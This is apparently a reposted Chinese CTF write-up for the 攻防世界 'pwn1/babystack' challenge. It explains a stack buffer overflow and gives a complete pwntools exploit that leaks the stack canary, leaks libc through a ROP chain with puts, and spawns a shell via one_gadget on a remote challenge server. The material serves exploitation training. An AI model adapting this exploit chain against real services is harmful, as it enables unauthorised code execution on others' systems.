博客
关于我
攻防世界-pwn1-Writeup
阅读量:566 次
发布时间:2019-03-09

本文共 2235 字,大约阅读时间需要 7 分钟。

pwn1

考点:栈溢出,canary绕过

基本情况

程序实现功能是往栈上读写数据。

保护措施
Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)
栈溢出
......  while ( 1 )  {       menu();    v3 = my_input();    switch ( v3 )    {         case 2:        puts(&s);        break;      case 3:        return 0LL;      case 1:        read(0, &s, 0x100uLL);                  // 栈溢出        break;......

栈溢出空间还是比较大的。

思路

使用栈溢出覆盖 canary 最后一字节,读取出 canary ,成功绕过 canary 保护。

#leak canarypayload = 'a'*0x89add(payload)show()p.recvuntil('a'*0x89)#gdb.attach(p)canary = u64('\x00'+p.recv(7))log.success("canary:"+hex(canary))

题目没有预留后门,并提供 libc ,所以泄露 libc 调用 onegadget getshell 。泄露 libc 需要借助输出函数,即需要控制 rip 调用。

泄露 libc 还需要 rop 回到 main 执行下一步操作。

#leak libcpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)payload += p64(start_addr)add(payload)leave()puts_leak=u64(p.recv(6).ljust(8,'\x00'))log.success("puts_leak:"+hex(puts_leak))

最后再次控制 rip 。

#get shellpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(onegadget)add(payload)leave()

EXP

from pwn import *context.log_level = 'debug'#p = process("./babystack")p = remote("124.126.19.106",51939)elf = ELF("./babystack")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")def add(context):    p.recvuntil(">> ")    p.sendline('1')    p.send(context)def show():    p.recvuntil(">> ")    p.sendline('2')def leave():    p.recvuntil(">> ")    p.sendline('3')#leak canarypayload = 'a'*0x89add(payload)show()p.recvuntil('a'*0x89)#gdb.attach(p)canary = u64('\x00'+p.recv(7))log.success("canary:"+hex(canary))#leak libcputs_plt = elf.plt['puts']puts_got = elf.got['puts']pop_rdi = 0x0000000000400a93start_addr = 0x400720payload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)payload += p64(start_addr)#gdb.attach(p)add(payload)leave()puts_leak=u64(p.recv(6).ljust(8,'\x00'))log.success("puts_leak:"+hex(puts_leak))libc_base = puts_leak - libc.symbols['puts']log.success("libc_base:"+hex(libc_base))onegadget = libc_base + 0x45216log.success("onegadget:"+hex(onegadget))#get shellpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(onegadget)add(payload)leave()p.interactive()

转载地址:http://smppz.baihongyu.com/

你可能感兴趣的文章
navicat导入.sql文件出错2006- MySQLserver has gone away
查看>>
Navicat导入海量Excel数据到数据库(简易介绍)
查看>>
Navicat工具Oracle数据库复制 or 备用、恢复功能(评论都在谈论需要教)
查看>>
Navicat工具中建立数据库索引
查看>>
navicat工具查看MySQL数据库_表占用容量_占用空间是多少MB---Linux工作笔记048
查看>>
navicat怎么导出和导入数据表
查看>>
Navicat怎样同步两个数据库中的表
查看>>
Navicat怎样筛选数据
查看>>
Navicat报错connection is being used
查看>>
Navicat报错:1045-Access denied for user root@localhost(using passwordYES)
查看>>
Navicat控制mysql用户权限
查看>>
navicat操作mysql中某一张表后, 读表时一直显示正在载入,卡死不动,无法操作
查看>>
Navicat连接mysql 2003 - Can't connect to MySQL server on ' '(10038)
查看>>
Navicat连接mysql数据库中出现的所有问题解决方案(全)
查看>>
Navicat连接Oracle出现Oracle library is not loaded的解决方法
查看>>
Navicat连接Oracle数据库以及Oracle library is not loaded的解决方法
查看>>
Navicat连接sqlserver提示:未发现数据源名并且未指定默认驱动程序
查看>>
navicat连接远程mysql数据库
查看>>
Navicat通过存储过程批量插入mysql数据
查看>>
Navicat(数据库可视化操作软件)安装、配置、测试
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-11-08 14:42:11   当前IP: 10.2.231.180   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2025 baihongyu.com 京ICP备2021015314号-2